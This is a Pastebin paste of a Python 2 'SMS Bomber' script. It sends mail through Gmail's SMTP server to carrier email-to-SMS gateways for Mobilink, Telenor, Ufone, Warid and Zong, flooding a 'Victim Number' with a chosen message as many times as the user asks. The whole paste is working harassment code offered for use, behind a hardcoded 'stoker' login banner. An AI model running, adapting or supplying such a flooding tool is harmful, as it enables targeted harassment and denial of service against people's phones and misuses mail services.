stoker

SMS BOMBER

Jan 25th, 2014
773
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.23 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3.  
  4. import smtplib
  5. import sys
  6. import os
  7.  
  8. os.system('title Python Sms Bomber')
  9.  
  10. mailserver = smtplib.SMTP('smtp.gmail.com')
  11. mailserver.ehlo()
  12. mailserver.starttls()
  13. mailserver.ehlo()
  14.  
  15. print '''
  16.  
  17. ==> Welcome to Python SMS Bomber.
  18. ==> Author: Muhammad Adeel
  19. ==> FB: fb.com/xtoker
  20.  
  21. ==> Currently Available Carriers are:
  22.  
  23.    1. Mobilink
  24.    2. Telenor
  25.    3. Ufone
  26.    4. Warid
  27.    5. Zong
  28.  
  29. ==> Welcome to Login Panel:
  30.  
  31.  '''
  32.  
  33.  
  34. username = ""
  35.  
  36. while not username:
  37.  
  38.   username = raw_input("Enter Username: ")
  39.  
  40. password = ""
  41.  
  42. while not password:
  43.  
  44.   password = raw_input("Enter Password: ")
  45.  
  46. if username == "stoker" and password == "stoker":
  47.  
  48.     print """
  49.  
  50. ______      ___                   ___
  51. | ___ \    | |                   | |    
  52. | |_/ /_   _| |__   ___  _ __ ___ | |__  
  53. |  __/| | | | '_ \ / _ \| '_ ` _ \| '_ \
  54. | |   | |_| | |_) | (_) | | | | | | |_) |
  55. \_|    \__, |_.__/ \___/|_| |_| |_|_.__/
  56.         __/ |                            
  57.         |___/
  58.  
  59.  
  60.      Author: Muhammad adeel aka Innoxent Stoker
  61.      FB: fb.com/xtoker
  62.      Mail: [email protected]
  63.  
  64.  
  65. \n"""
  66.  
  67. else:
  68.   print "\n==> Wrong Username and Password."
  69.   sys.exit()
  70.  
  71. username = raw_input("==> Your Email Adress: ")
  72. password = raw_input("==> Email's Password: ")
  73. number = raw_input("==> Victim Number: ")
  74. carrier = raw_input("==> Carrier: ")
  75. text = raw_input("==> Your Message: ")
  76. time = int(raw_input("==> How many Times you want to send: "))
  77.  
  78.  
  79.  
  80.  
  81. print '\n==> Please Wait ....\n'
  82. print '==> Bomber is Starting...\n'
  83.  
  84. if carrier == "Mobilink":
  85.  
  86.   sendto = number+'@mobilinkworld.com'
  87.  
  88. elif carrier == "Telenor":
  89.  
  90.   sendto = number+'@telenor.com'
  91.  
  92. elif carrier == "Ufone":
  93.  
  94.   sendto = number+'@ufonemms.com'
  95.  
  96. elif carrier == "Warid":
  97.  
  98.   sendto = number+'@warid.com'
  99.  
  100. elif carrier == "Zong":
  101.  
  102.   sendto = number+'@zong.com'
  103.  
  104. else:
  105.  
  106.   print "Invalid Carrier."
  107.  
  108.  
  109.  
  110. mailserver.login(username,password)
  111.  
  112. x = raw_input("Hit 'Enter' To Launch Bomber .. ")
  113.  
  114. for x in range(0,time) :
  115.   mailserver.sendmail(username, sendto, text)
  116.   print "Message Has been Sent."
  117.  
  118. mailserver.close()
  119.  
  120.  
  121. stopapp = raw_input("Job Finished! Press 'ENTER' to close Programme")
Add Comment
Please, Sign In to add comment